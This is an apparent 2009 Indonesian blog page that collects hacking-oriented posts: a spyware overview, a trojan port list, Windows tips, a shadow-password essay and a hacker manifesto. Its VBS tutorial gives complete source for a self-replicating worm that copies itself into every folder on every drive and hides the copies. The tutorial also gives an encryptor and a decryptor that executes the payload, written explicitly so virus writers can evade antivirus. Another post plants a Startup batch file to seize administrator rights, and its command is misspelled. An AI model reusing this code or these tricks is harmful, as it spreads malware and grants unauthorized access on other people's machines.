Friday, March 27, 2009

SPYWARE

Spyware merupakan program yang dibuat dengan tujuan untuk memata-matai (spy). SPYWARE bukanlah suatu ancaman biasa, namun bisa jadi sangat berbahaya karena sesuai dengan namanya, spyware sangat mengancam privasi dan bisa menurunkan kinerja suatu system&jaringan



Spyware telah merajalela sejak tahun 1994. Saat itu, SPYWARE yang cukup terkenal digunakan adalah Gator. Spyware ini masih exist sampai saat ini. Sejalan dengan perkembangan teknologi, semulanya spyware ditujukan untuk bisnis periklanan. Namun kini semua telah berubah, spyrware digunakan unuk tujuan destructive.



Kategori Spyware

----------------

SPYWARE memiliki beberapa kategori, yaitu:

*

Trojan / backdoor
*

Adware
*

Keylogger
*

DDoS agent (zombie)
*

Sniffer, password cracker
*

Browser Helper Object
*

P2P contohnya kazaa.
*

RAT – Remote Access Tool/Trojan.

Kalau kita lihat ada yang overlapping dengan solusi anti-virus yaitu di bagian trojan. Solusi anti-virus umumnya bisa mendeteksi keberadaan trojan di dalam sistem kita. Namun untuk kategori lain seperti adware, P2P, hacker tools, umumnya anti virus tidak memasukkan kategori ini di dalam deteksi mereka.



Lalu kenapa tool seperti sniffer digolongkan ke dalam spyware ??? Ada alasan di belakangnya. Sebagaimana kita ketahui bahwa tool sniffer bisa mempunyai dua sisi yaitu sisi yang baik atau berguna bagi administrator. Sniffer bisa digunakan oleh administrator untuk melakukan ‘tracing’ atau analisa paket di jaringan mereka. Network Load utility yang untuk mengetahui kapasitas bandwidth juga menggunakan teknologi sniffer. Tool IDS – Intrusion Detection System yang berbasis network juga menggunakan teknologi sniffer untuk mendeteksi adanya intrusion di satu jaringan.



Namun di sisi lain ternyata sniffer bisa digunakan untuk tujuan yang tidak baik misalnya untuk sniffing user-id dan password yang digunakan di suatu jaringan. Sehingga apabila sistem authentication yang ada tidak menggunakan enkripsi untuk password dan user-id atau berupa ‘plain-text’ maka sniffer dapat dengan mudah melihat user-id dan password tersebut.



Selain itu ada kategori spyware yang orang dengan senang hati untuk meng-installnya yaitu P2P – Point to Point software seperti contohnya adalah Kazaa – P2P untuk sharing file yang sangat populer. Di dalam Kazaa ini banyak sekali terdapat adware – software iklan – karena di situlah mereka mendapatkan profit. Kategori ini yang dimasukkan ke dalam ‘user awareness installation’ artinya user yang melakukan atau trigger instalasi sendiri bukan via embedded installation misalnya saat lakukan download atau akses ke Internet.



Well, selalu berhati-hatilah... ;)

Enter spyroZONE! - www.spyrozone.net

Mengenal TROJAN

Apakah trojan itu??

-Sebuah program ilegal (unauthorized) yang ada di dalam program yang dipercaya (legitimate). Program ilegal ini menjalankan suatu aktivitas yang rahasia yang tidak diinginkan oleh user.

-Sebuah program yang dipercaya (legitimate) yang telah diubah dan ditambah kode ilegal (unauthorized) didalamnya, kode ini menjalankan suatu fungsi yang rahasia dan tidak diinginkan oleh user.

-Semua program yang menjalankan fungsi yang semestinya, tapi karena ada suatu kode program didalamnya dan tidak diketahui oleh user, menjalankan suatu aktifitas yang tidak diinginkan oleh user.

Trojan bisa atau biasa juga disebut RAT's atau Remote Administration Tools. Nama dari Trojan ini diambil dari mitologi Yunani kuno tentang perang antara pihak Yunani dan Troya. Karena tidak bisa menembus pertahanan pihak Troya, pihak Yunani memberikan hadiah berupa sebuah patung kuda kayu raksasa sebagai pengakuan kemenangan pihak Troya. Mereka menerima kuda raksasa itu dan kemudian membawanya pulang. Pada malam harinya, pasukan Yunani yang berada didalam kuda tersebut keluar dan mulai menyerang Troya.



Bagaimana Trojan bekerja??

Ketika korban menjalankan server ia akan membuka beberapa port yang spesifik dan menunggu untuk koneksi. Hal ini bisa menggunakan TCP atau UDP protokol. Ketika kita melakukan koneksi dengan alamat ip korban kita bisa melakukan apa saja karena server membiarkan kita melakukan fungsi yang ada pada Trojan dikomputer korban (setiap Trojan berbeda-beda dalam hal fasilitas yang ada). Beberapa Trojan restart setiap kali windows diload. Mereka memodifikasi win.ini atau system.ini agar Trojan bisa restart tapi beberapa Trojan baru menggunakan registry supaya mereka bisa restart. Trojan berkomunikasi seperti client dan server. Korban menjalankan server sedangkan penyerang mengirim perintah pada komputer yang terinfeksi dengan menggunakan client, dan server kemudian mengikuti apa yang diperintahkan oleh client.


Port-port Yang Umum Digunakan Oleh Trojan

Dibawah ini adalah daftar port yang biasa digunakan oleh Trojan :

Masters Paradise|30129


NetMonitor 1.x|7301

Robo-Hack|5569


NetMonitor 2.x|7306

NetMonitor|7300


NetMonitor 3.x|7307

Portal of Doom|9872


NetMonitor 4.x|7308

iNi-Killer|9989


ICKiller|7789

DeepThroat|6670


Remote Grab|7000

DeepThroat|6771


Priority|6969

Firehotcker|5321


GateCrasher|6969

Sockets de Troie 1.x|5001


Blade Runner 2.x|5402

Sockets de Troie|5000


Blade Runner 1.x|5401

ICQTrojan|4590


Blade Runner|5400

Portal of Doom|3700


WinCrash|4092

The Invasor|2140


Phineas Phucker|2801

Bugs|2115


Deep Throat|2140

Trojan Cow|2001


Ripper|2023

VooDoo Doll|1245


FTP99CMP|1492

Ultors Trojan|1234


BackDoor|1999

Doly Trojan|1011


Psyber Stream Server|1170

Shockrave|1981


WebEx|1001

Shivka-Burka|1600


SpySender|1807

Satanz Backdoor|666


Silencer|1001

Portal of Doom 1.x|9873


Senna Spy|11000

Portal of Doom 2.x|9874


Progenic Trojan|11223

Portal of Doom 3.x|9875


Hack?99 KeyLogger|12223

Portal of Doom 4.x|10067


GabanBus|1245

Portal of Doom 5.x|10167


NetBus|1245

Whack-a-mole|12361


GirlFriend|21544

Whack-a-mole 1.x|12362


Prosiak|22222

Priority|16969


Prosiak|33333

Millennium|20001


Evil FTP|23456

NetBus 2 Pro|20034


Ugly FTP|23456

Delta|26274


DeepBO|31338

Back Orifice|31337


NetSpy DK|31339

Back Orifice|31338


BOWhack|31666

BigGluck|34324


Masters Paradise 2.x|40423

The Spy|40412


Masters Paradise 3.x|40426

Masters Paradise|40421


Sockets de Troie|50505

Masters Paradise 1.x|40422


Fore|50766

Remote Windows Shutdown|53001


Millenium |20000

Telecommando|61466


Devil 1.03 |65000

Devil|65000


NetMonitor| 7306

The tHing|6400


Streaming Audio Trojan| 1170

NetBus 1.x|12346


Socket23 |30303

NetBus Pro 20034


Gatecrasher |6969

SubSeven|1243


Telecommando | 61466

NetSphere|30100


Gjamer |12076

Silencer |1001


IcqTrojen| 4950

Priotrity |16969


Wincrash2| 2583

Vodoo | 1245


Netspy |1033

Wincrash | 5742


ShockRave | 1981

Stealth Spy |555


GirlFriend | 21554

Pass Ripper |2023


Phase0 | 555

Attack FTP |666


WhackJob | 23456

Fore, Schwindler| 50766


Senna Spy Trojans| 11000

Tiny Telnet Server| 34324


Kuang |30999

RemoteWindowsShutdown | 53001


Hackers Paradise | 456

RoboHack |5569


Doly Trojan | 1011

Silencer | 1001


FTP99CMP | 1492

Striker | 2565


Shiva Burka | 1600

TheSpy | 40412


Indoctrination | 6939

Prosiak 0.47 | 22222


Psyber Streaming Server | 1509

ProgenicTrojan | 11223


WebEx |1001

PortalOfDoom | 9872


Phineas | 2801

InIkiller | 9989


UglyFtp | 23456

IcqTrojan | 4950


Backdoor | 1999

BladeRunner | 5400


TrojanCow | 2001

Remote Windows Shutdown | 53001


iNi-Killer | 9989

BigGluck, | 34324


ICQKiller | 7789

NetSpy DK | 31339


Portal of Doom | 9875

Hack?99 KeyLogger | 12223


Firehotcker | 5321

Master Paradise |40423


BO jammerkillahV | 121

-Sekian, semoga bermanfaat.

Enter spyroZONE! - www.spyrozone.net

TEHNIK ENKRIPSI VIRUS VBS

Melihat banyaknya email dan forum yang menanyakan cara mengenkripsi virus vbs atau js,maka saya mau menulis tutorial cara mengenkripsi virus vbs. Bila anda menggunakan program atau script encrypter maka virus kamu akan didetect oleh antivirus sebagai Encrypter.Tools atau Encrypter.Gen. Untuk itu saya akan memberitahu cara enkripsi sederhana dan kamu dapat memilih sendiri karakter ASCII nya.

Prinsip kerjanya begini, baca file perkarakter lalu ubah karakter demi karakter menjadi karakter ASCII(nomor ASCII +2). Jadi hasilnya, setiap huruf akan ditulis sebagai 2 huruf didepannya dalam tabel ASCII. Untuk unencrypt nya kamu cukup membalikan cara kerja encrypter tadi, yaitu mengurangkan karakter ASCIInya dengan 2. Lalu mengeksekusi yang telah di unencrypt tadi. Teknik ini disebut enkripsi XOR.Pusing ya.. hehehe saya juga pusing ;-) untuk meng enkripsi kamu harus mengubah semua karakter " menjadi karakter ASCII lain, seperti ä,ö,æ,Æ,ô,ò dll. Tapi kamu harus tau berapa angka ASCIInya maka dari itu pertama kamu
butuh table ASCII. ;Þ~

Pertama, ketikan script dibawah ini untuk membuat tabel ASCII. Nah kamu bisa memilih karakter ASCII sesuai pilihanmu.


'<----------------- awal ASCII Tabel ---------------------->
for i=0 to 256
x=x+"angka "&i&" --> "&chr(i)&vbcrlf
next

Set Anton = CreateObject("Scripting.FileSystemObject")
Set hilman=anton.createtextfile("C:\ascii.txt")
hilman.write x
hilman.close
'<----------------- akhir ASCII Tabel --------------------->


lalu simpan dengan nama ascii.vbs dan jalankan. maka di drive C: akan terdapat file ascii.txt dan didalamnya terdapat angka beserta bentuk huruf ASCIInya dari 0 sampai 256(range ini bisa kamu pilih sendiri). Nah udah liat kan sekarang buka virusmu ketik Ctrl+H(Replace). Isikan " pada Find what dan ¤ pada Replace with. Klik Replace All dan Save.
Kamu harus tau berapa angka ASCII " dan ¤(caranya ya liat tabel tadi ;Þ)
...
angka 34 --> "
angka 164 --> ¤
...

catatan : "jangan memilih kode ASCII yang telah ada dalam virus kamu, karena bila di enkripsi maka akan ikut diubah menjadi tanda kutip(").

Kedua, sekarang saatnya kita buat script encrypternya hehehe.. buka text editor kamu dan ketik script berikut :


'<---------------- awal encryptor ---------------------->
Set Anton = CreateObject("Scripting.FileSystemObject")
Set maVero=Anton.OpenTextFile("C:\suriv.vbe")
virus=maVero.ReadAll
On Error Resume Next
VA3 = ""
For I = 1 To Len(virus)
Baca = Asc(Mid(virus, I, 1))
If Baca = 164 Then
'nah ini untuk karakter " yang kita tukar tadi..
'jadi, jika ditemukan karakter ASCII 164(¤) maka..
Tukar = Chr(215)
'ubah jadi karakter ASCII 215(×)
'nah selanjutnya terserah kamu, kalau kamu mau mengubah suatu huruf menjadi karakter ASCII yang
'spesial silahkan asal di catat dan di ingat.
ElseIf Baca = 10 Then
Tukar = Chr(28)
ElseIf Baca = 13 Then
Tukar = Chr(29)
Else
Tukar = Chr(Baca - 1)
End If
hasil=hasil & Tukar
Next
Set hilman=anton.createtextfile("C:\hasil.txt")
hilman.write hasil
hilman.close
'<----------------- akhir encryptor --------------------->

'ini contoh file C:\suriv.vbe yang dipakai pada encryptor di atas.
'<---------[ awal contoh kode yang akan di encrypt ]------------>
On Error Resume Next
Set ElkaUNP = CreateObject(¤Scripting.FileSystemObject¤)
Set Padang = ElkaUNP.OpenTextFile(Wscript.ScriptFullName,1)
Kode = Padang.ReadAll
Set Drives = ElkaUNP.Drives
For each Drive in Drives
if Drive.isReady then
Periksa(Drive & ¤\¤)
End if
Next
Sub Periksa(Target)
On Error Resume Next
Set Elektronika = ElkaUNP.GetFolder(Target)
SumBar = Target & ¤\ElkaUNP.vbs¤
if (SumBar <> ¤ElkaUNP.vbs¤) then
Set FT_UNP = ElkaUNP.CreateTextFile(SumBar)
FT_UNP.Write Kode
FT_UNP.Close
FT_UNP = ¤¤
Set Atribut = ElkaUNP.GetFile(SumBar)
Atribut.Attributes = 35
SumBar = ¤ElkaUNP.vbs¤
End if
For Each SubFolder in Elektronika.SubFolders
Periksa(SubFolder.Path)
Next
End Sub
'<---------[ akhir contoh kode yang akan di encrypt ]------------>

pada script diatas ada 3 karakter yang saya ubah jadi karakter ASCII. yaitu karakter :
164 jadi 215
10 jadi 28
13 jadi 29 (liat aja di tabel..;Þ~ huruf apa itu)
dan selain yang tiga karakter itu, angka ASCII karakter-1(jika yang terbaca 40 maka diubah jadi
chr(39) --> 40-1=39)

hasil file virus kamu yang telah di enkripsi akan ada di C:\Hasil.txt

Ketiga, copy isi file 'C:\Hasil.txt' dan buat script encrypter berikut ini :
'<------------------- awal unencryptor --------------------->
Explorer="pastekan isi file C:\Hasil.txt diantara tanda kutip ini. Nah karena tanda kutip ini lah
saya menyuruh kamu menukar tanda kutip dengan yang lain, karena script tidak akan jalan kalau ada
3 atau 4 tanda kutip ;-)"
Dim Microsoft
For I = 1 To Len(Explorer)
Internet = Asc(Mid(Explorer, I, 1))
If Internet = 215 Then
'jika menemukan karakter ASCII 215 maka
Windows = Chr(34)
'akan diubah menjadi tanda " kembali. sederhana kan..
'selanjutnya hanya kebalikan dari encryptor diatas(jika 10 diubah jadi 28 maka sekarang di
'kembalikan 28 jadi 10 ;-) dst
ElseIf Internet = 28 Then
Windows = Chr(10)
ElseIf Internet = 29 Then
Windows = Chr(13)
Else
Windows = Chr(Internet + 1)
End If
Microsoft = Microsoft & Windows
Next

Set Anton = CreateObject("Scripting.FileSystemObject")
Set hilman=anton.createtextfile("c:\hasilx.txt")
hilman.write Microsoft
hilman.close
'<------------------ akhir unencryptor --------------------->

sekarang lihat file C:\hasilx.txt nah bandingkan dengan virus yang belum di enkrip, sama? kalau sama berarti tak ada error dalam enkripsinya.

Terakhir, tambahkan execute pada akhir unencryptor sehingga menjadi seperti dibawah ini:
'<------------------ awal virus jadi --------------------->
'badan virus
Explorer="&;,,,,,,,,,Z `v`k bnmsng jncd x`mf `j`m ch dmbqxos \,,,,,,,,,,,,= Nm Dqqnq Qdrtld Mdws
Rds Dkj`TMO < Bqd`sdNaidbs'×Rbqhoshmf-EhkdRxrsdlNaidbs×( Rds O`c`mf < Dkj`TMO-NodmSdwsEhkd'Vrb
qhos-RbqhosEtkkM`ld+0( Jncd < O`c`mf-Qd`c@kk Rds Cqhudr < Dkj`TMO-Cqhudr Enq d`bg Cqhud hm Cq
hudr he Cqhud-hrQd`cx sgdm Odqhjr`'Cqhud % ×[×( Dmc he Mdws Rta Odqhjr`'S`qfds(
Nm Dqqnq Qdrtld Mdws Rds Dkdjsqnmhj` < Dkj`TMO-FdsEnkcdq'S`qfds( RtlA`q < S`qfds % ×[Dkj`TMO-
uar× he 'RtlA`q ;= ×Dkj`TMO-uar×( sgdm Rds ES^TMO < Dkj`TMO-Bqd`sdSdwsEhkd'RtlA`q( ES^
TMO-Vqhsd Jncd ES^TMO-Bknrd ES^TMO < ×× Rds @sqhats < Dkj`TMO-FdsEhkd'RtlA`q( @sq
hats-@ssqhatsdr < 24 RtlA`q < ×Dkj`TMO-uar× Dmc he Enq D`bg RtaEnkcdq hm Dkdjsqnmhj`-RtaE
nkcdqr Odqhjr`'RtaEnkcdq-O`sg( Mdws Dmc Rta &;,,,,,,,,,Z `jghq bnmsng jncd x`mf `j`m ch d
mbqxos \,,,,,,,,,,,,= "
'untuk unenkripsinya
Dim Microsoft
For I = 1 To Len(Explorer)
Internet = Asc(Mid(Explorer, I, 1))
If Internet = 215 Then
Windows = Chr(34)
ElseIf Internet = 28 Then
Windows = Chr(10)
ElseIf Internet = 29 Then
Windows = Chr(13)
Else
Windows = Chr(Internet + 1)
End If
Microsoft = Microsoft & Windows
Next
'untuk mengeksekusi hasil unenkripsi
Execute Microsoft
'<------------------ akhir virus jadi --------------------->

Sekian dulu tuturial enkripsi virus VBS ini sebagai jawaban atas semua email yang
menanyakan encryptor untuk virusnya sendiri. Dengan sedikit kreatif kamu bisa membuat encryptor kamu sendiri dari pengembangan encryptor di atas. Tutorial ini juga sebagai jawaban atas kurang jelasnya cara mengenkripsi virus yang terdapat saat ini. Terutama pada para pemula yang 'agak' butuh penjelasan panjang lebar.

Greet's to :
Indonesian Virus Writer dimana saja khususnya spidey yang suka membagi ilmunya hehehe.. :Þ~
SECTOR'S team,SevenC,dan pembuat virus VBS.Redlof dimanapun kamu berada.
Anak Warnet Payakumbuh(RiNaL,antho,alvin-s,peri,si bos,pak guru,yudi,ade dll)
MinangCrew, Kadal_Punk, Joehuntters, Aulia Abrar, Aldi_Member, Ridho(Elka02UNP), Adriyan, Bob dll.
Buat semua Anak Teknik Elektronika/Fakultas Teknik /UNP /Padang /SumBar /Indonesia.
Yance,Ee(toemis),Adek,Ata,Dodi(Bolot). hidup Payobasuang! dan yang tak tersebut namanya...

Enter spyroZONE! - www.spyrozone.net

MEMBUAT DISKET BOOTING WINDOWS XP

Hallo semuanya.... Kali ini spyro akan ngasih tips cara membuat disket booting pada windows XP. Dan seperti biasa, tanpa mengurangi rasa hormat, saya persilahkan anda untuk menutup halaman ini pelan-pelan jikasaja anda sudah tau caranya. Yeah, daripada anda buang-buang waktu untuk membaca artikel jelek ini.



Ups, masih diterusin ngebacanya?? Okay dech, lansung aja ngga' usah banyak omong..!! Berikut ini langkah-langkahnya:



1.

Formatlah sebuah disket. Pakai apa?? Ya jelas pakai Windows XP Untility!!
2.

Kemudian, salinlah file Ntldr dan Ntdetect.com dari folder 1386 pada CD Windows XP. Kalo ngga' punya CDnya? Salin aja dari disket Windows XP Setup. Kalo ngga' punya juga? Nyebur aja ke laut!! becanda koq... Alternatif terakhir, kamu bisa ambilkedua file tersebut dari PC yang bersistem operasi Windows XP.
3.

Buatlah file Boot.ini dengan Notepad. Ketiklah:

[boot loader]

timeout=30

default= multi(0)disk(0)rdisk(0)partition(1)\windows

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\windows="Windows XP"



Selesai dech.....



Dan sampailah kita di penghujung artikel. Dengan segala kerendahan hati dari perasaan yang mendalam, saya ucapkan terimakasih. Semoga artikel jelek ini bermanfaat.

Enter spyroZONE! - www.spyrozone.net

MENDAPATKAN AKSES ADMIN WINDOWS XP

/---< Metode exploitasi:



Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:


C:\Documents and Settings\Administrator\


Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.



//---< Exploitasi


1. MELIHAT USER TERDAFTAR
------------------------------
C:\DOCUME~1\spyro>net user

User accounts for \\spyroNET

---------------------------------------------------------------------------

Administrator Guest spyro
HelpAssistant SUPPORT_388945a0 SuperUser
The command completed successfully.


MELIHAT HAK AKSES USER
----------------------------------------------

C:\DOCUME~1\spyro>net user SuperUser
User name SuperUser
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 7/12/2004 3:38 AM
Password expires Never
Password changeable 7/12/2004 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/12/2004 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:

net localgoup Administrators spyro /add

Simpan di lokasi berikut:
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup

Tunggu sang admin untuk login... setelah itu, level kita sudah setingkat admin

Enter spyroZONE! - www.spyrozone.netEnter spyroZONE! - www.spyrozone.net

SHADOW PASSWORD

Secara umum teknik "Shadow Password" di susun sebagai berikut:
Untuk semua entry dalam direktori '/etc/passwd_file' , password yang terenkripsi dipindah ke file yang lain, seperti '/etc/shadow'.
Sementara '/etc/passwd' dapat dibaca oleh tiap orang dalam sistem, 'etc/shadow' hanya dapat dibaca oleh group yang bersangkutan, bahkan mungkin hanya dapat dibaca oleh superuser. Hal ini diperlukan untuk mengantisipasi daftar password yang terenkripsi dipecahkan oleh program dictionary.
Ide pada "menyembunyikan informasi" (information hiding) adalah satu dari banyak teknik yang terkandung dalam kategori "Security through Obscurity". Menurut orang-orang komunitas LINUX, ada 2 opini tentang "Security through Obscurity", yaitu:

1. "Dapat membantu dan tidak dapat dirusak, maka marilah kita menggunakannya"
2. "Sebenarnya dapat dirusak, sebab dia membuat perasaan yang salah pada sekuriti, dan sebaiknya jangan digunakan"

Tetapi masih banyak lagi orang yang akan mengemukakan kebaikan dari menggunakan shadow password, maka akan dikemukakan ketidak-baikan dari shadow password. Asumsi utama ketika orang menggunakan sistem dengan shadow password adalah bahwa penggunaan sistem ini menjanjikan bahwa tidak seorang pun yang tidak mempunyai hak, akan dapat melihat daftar passwordnya.
Tetapi bagaimanapun juga, ada beberapa manusia dapat membuat kesalahan dengan melepas daftar password tersebut. Mungkin lawan (Adversary) yang mempunyai akses root sebelumnya, dengan menuju ke "tempat kerja" SysAdmin pada waktu yang tepat, ia akan dapat memperoleh informasi yang dibutuhkan. Adversary mungkin tidak cukup waktu untuk meng-install program "backdoor", tetapi dia dapat "melayangkan pukulan pada file password tersebut.
Atau dengan membuat sebuah error pada setting permission dari 'etc/shadow', atau memberi instruksi "chmod a+r /etc/*" tanpa memikirkan keterlibatannya pada'/etc/shadow'.
Atau kemungkinan lain yaitu terdapatnya problem sekuriti yang baru saja di perbaiki setelah menggunakan "CERT advisory", hal ini akan membuat daftar password akan terbaca oleh siapapun juga ! Dan masih banyak cara lagi untuk melepaskan isi dari '/etc/shadow', bila kita pernah menjadi seorang SysAdmin yang berpengalaman.
Masalah dengan menggunakan sistem seperti shadow password adalah system ini akan memberikan perasaan salah dari security (false sense of security). Pada kasus ini, mereka akan mengira bahwa daftar password sudah aman dan terproteksi. Perasaan ini sering membuat sysAdmin malas menggunakan metode yang lebih superior, dan lebih pro-aktif (pro-active method) untuk memproteksi file password.
Yang paling mudah dan yang paling murah pada metoda pro-aktif adalah cara menukar direktori password. Tidak ada sistem lain yang diubah, --hanya menukar posisi direktori '/bin/passwd'. Terdapat beberapa program dan utiliti UNIX untuk menukar default direktori password, seperti "Matt Bishop's passwd+" dari darmouth.edu:/pub/security dan "Mark Henderson's ANLpasswd" dari info.mcs.anl.gov:/pub/systems.
Pada dasarnya, tiap seseorang mengubah pasword, program-program tadi akan membandingkan dengan dictionary (dan ke gecos field), hal ini mirip dengan cara kerja program ceacker. Apabila user memilih password yang "lemah", program pro-aktif ini akan memaksa user untuk mengubah pilihan password mereka.
Tanpa menggunakan sebuah program pro-aktif, kita harus juga mengkawatirkan tentang serangan program cracker (pada risetm, lebih dari 15 tahun belakangan ini, tanpa program pro-aktif, sebagian besar user akan memilih password yang mudah, dapat di crack, sering berupa nama depan wanita). Apabila bergantung pada sebuah sistem shadow password untuk mengamankan password kita, maka direktory '/etc/shadow/' akan dijamin mudah diserang.
Bagaimanapun juga, ketika menggunakan sebuah pro-aktif password checker, kita dapat mengumumkan ke dunia luar nama-nama password yang mudah diserang. Memaksa user untuk mengganti password mereka secara berkala juga akan mengurangi kemungkinan bocornya sekuriti.

Enter spyroZONE! - www.spyrozone.net

Menambahkan Folder Pribadi Pada Menu Send To

Cara tercepat untuk menyalin suatu file kedalam Flashdisk Anda biasanya ialah dengan menggunakan menu SendTo yang ada pada Context menu Windows Explorer (Klik kanan pada File -> Send To). Disana ada beberapa pilihan lokasi, diantaranya ialah My Documents, Floppy A (jika ada), Flashdisk Anda (jika FD Anda sedang tertancap), Desktop (membuat Shortcut di Desktop), etc.

Nah, bagaimana jika kita ingin folder kita berada pada menu Send To tersebut? Tentu akan mempersingkat waktu jika kita ingin menyalin suatu dokumen kedalam directory kita dengan hanya melakukan klik kanan -> Send To. Berikut panduannya:

1. Klik Start -> Run kemudian ketik:

explorer %userprofile%\sendto

Kemudian tekan Enter atau klik OK. Directory Send To akan terbuka di hadapan Anda.

2. Klik kanan pada area kosong directory tersebut, pilih menu New kemudian klik Shortcut. Jendela wizard untuk membuat Shortcut baru akan muncul. Klik Browse dan pilihlah lokasi Folder pribadi Anda yang ingin Anda letakkan pada menu Send To. Dalam contoh ini, lokasi folder saya adalah D:\data\spyro

Klik [Next] kemudian beri nama Shortcut Anda. Klik [Finish] Sesudahnya.

3. Selesai... :) Kini, untuk menyalin suatu file kedalam folder pribadi Anda, Anda bima memanfaatkan menu Send To.


Sekian, selamat mencoba.. dan.. semoga bermanfaat ^_*

Enter spyroZONE! - www.spyrozone.net

Hacker - ALL ABOUT

----------------------

Hacker atau Cracker?

----------------------



Jangan dulu punya anggapan buruk dengan yang namanya Hacker, karena anda mesti tahu seperti apa Hacker sejati itu. Masalahnya, ada sekelompok orang yang menyebut-nyebut dirinya sebagai Hacker padahal mereka itu adalah seorang Cracker. Hacker sejati sebenarnya tidak sejahat (atau bahkan tidak jahat sama sekali) seperti yang kebanyakan dipikirkan orang. Hacker adalah sekumpulan atau beberapa kelompok yang bertujuan untuk mengembangkan ilmu pengengetahuan dan sharing informasi bebas tanpa batas. Hacker adalah seseorang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu system,komputer, atau jaringan komputer. Mereka terdiri dari para programer yang ahli jaringan. Mereka jugalah yang berjasa membangun Internet lewat pengembangan sistem operasi UNIX.



Istilah Hacker sendiri lahir sekitar tahun 1959 dari MIT(Massacusetts Institute of Technology), sebuah universitas di Amerika yang terdiri dari orang-orang cerdas namun cenderung tidak mempercayai adanya Tuhan (Atheis). Saat itulah semua berawal, dari sebuah ruangan baru, "EAM room" pada Building 26 MIT, sebuah tempat yang merupakan nenek moyang dari "dunia baru" yang kini kita kenal, tempat nenek moyang sebuah mesin yang kini kita sebut sebagai "komputer", mesin yang mampu membawa kita menuju kelebihbaikan dengan kebebasan informasi, dunia para Hacker sejati.



Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu. Mereka selalu berbagi informasi, memberi jawaban serta berlomba-lomba untuk berbuat yang terbaik agar dihormati di lingkungannya. Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu berulang-ulang dan membosankan. Mereka berpedoman pada kata-kata bijak : “Untuk mengikuti jalan - pandanglah sang ahli - ikuti sang ahli - berjalan bersama sang ahli - kenali sang ahli -jadilah sang ahli ”



Sementara itu, para cracker sibuk untuk memuaskan diri mereka dengan aktivitas Cracking. mulai dari membobol komputer, menebar virus (tanpa tujuan - beberapa Hacker sejati ada yang menulis virus namun dengan tujuan yang jelas), hingga mengakali telepon (Phreaking). Para Hacker menyebut mereka sebagai orang malas yang tidak bertanggung jawab. Jadi, sangat tidak adil jika kita tetap menganggap bahwa Hacker itu jahat dan menakutkan karena sangat jelas bahwa Hacker bersifat membangun sementara Cracker bersifat membongkar.



Ingin jadi seorang Hacker?? Tidak ada kata sulit bagi mereka yang mau belajar. Untuk menjadi seorang Hacker anda harus menguasai beberapa bahasa pemrograman dan tentu saja sikap-sikap yang bisa membuat anda diterima di lingkungan mereka. Biasanya calon Hacker memulai dengan belajar bahasa [Python] karena bahasa ini tergolong bahasa pemrograman yang termudah. Bahasan mengenai bahasa ini bisa anda lihat di www.python.org. Setelah itu anda juga harus menguasai [java] yang sedikit lebih sulit akan tetapi menghasilkan kode yang lebih cepat dari Python, [C], [C++] yang menjadi inti dari UNIX, dan [Perl] (www.perl.com ) serta [LISP] untuk tingkat lanjut.



Setelah menguasai semua kemampuan dasar diatas, calon Hacker disarankan untuk membuka salah sati versi UNIX open-source atau mempelajari LINUX, membaca kodenya, memodifikasi dan menjalankannya kembali. Jika mengalami kesulitan, disarankan untuk berkomunikasi dengan club pengguna Linux [ www.linpeople.org]



Sisi menarik dari seorang Hacker adalah dimana mereka saling bahu-membahu dalam menyelesaikan sebuah masalah dan membangun sesuatu. Tetapi sayangnya, kehidupan mereka yang menghabiskan 90% waktunya untuk aktivitas Hacking bukanlah hal yang baik. Kalau memang benar-benar ingin jadi Hacker, jadilah Hacker yang baik dengan memanfaatkan Teknologi Informasi untuk mengembangkan da'wah Islam.





------------------------------

Manifesto Sang Hacker

------------------------------



It happened again today. Another one sold out, sacrificing their dreams to the corporate security machine.



Damn whitehats, noone believes in a cause anymore.


Another bug was released today to the security mailing lists.


Damn Whitehats, they know not what they do.


Another potential computer genius was relegated to an existence of nothing more than a 9-5 cubicle-dwelling promotional tool.


Damn whitehats, putting money before discovery.


Another family was ravaged by cooperations and governments bent on instituting control over individuality, monitoring every action..


Another kid was sentenced today for searching for a way to understand the world. Convicted and imprisoned, not because of what he did, but because of what others thought he could do.


Damn Whitehats - Fear keeps them in business.


The public, believing anything it hears from "reputed experts". Screaming for blood. Looking for something to blame for their lost hope. Their lost ability to seek out new knowledge. Fear consumes them. They cannot let go of their uncertainty and doubt because there is no meaning. They seek to destroy explorers, outlaws, curiosity seekers because they are told too. They are told these people that seek information are evil. Individuality is evil. Judgment should be made based upon a moral standard set in conformity rather than resistance. Lives are ruined in the name of corporate profit and information is hoarded as a commodity.


Damn Whitehats, you were once like us.


I was a Whitehat. I had an awakening. I saw the security industry for what is really is. I saw the corruption, the lies, the deceit, the extortion of protection money in the form of subscription services and snake-oil security consultants.


I wanted to know, I wanted to understand, I wanted to go further then the rest. I never want to be held down by contracts and agreements.


You say I should grow up. You say I should find better things to do with my time. You say I should put my talent to better use. You're saying I should fall in line with the other zombies and forget everything I believe in and shun those with my drive, my curiosity, tell them it's not worth it, deny them of the greatest journey they will ever experience in their lives.


I am not a blackhat. The term is insulting, it implies I am the opposite of you. You think i seek to defeat security, when I seek something greater. I will write exploits, travel through networks, explore where you are afraid to go. I will not put myself in the spotlight and release destructive tools to the public to attract business. I will not feed the fear and hysteria created by the security industry to increase stock prices. I can, and will, code and hack and find out everything I can for the same reasons I did years ago.


I am a Hacker, dont try to understand me, you lost all hope of that when you crossed the line. You fail to see the lies and utter simplicity behind the computer security industry. Once, you may have shared my ideals. You fail to see the fact that security is a maintenance job.


Youve given up hope for something better. You fail to see yourself as worthless, fueling an industry whose cumulative result is nothing. I dont hate you, I dont even really care about you - If you try to stop me, you will fail, because I do this out of love -- you do it for money.


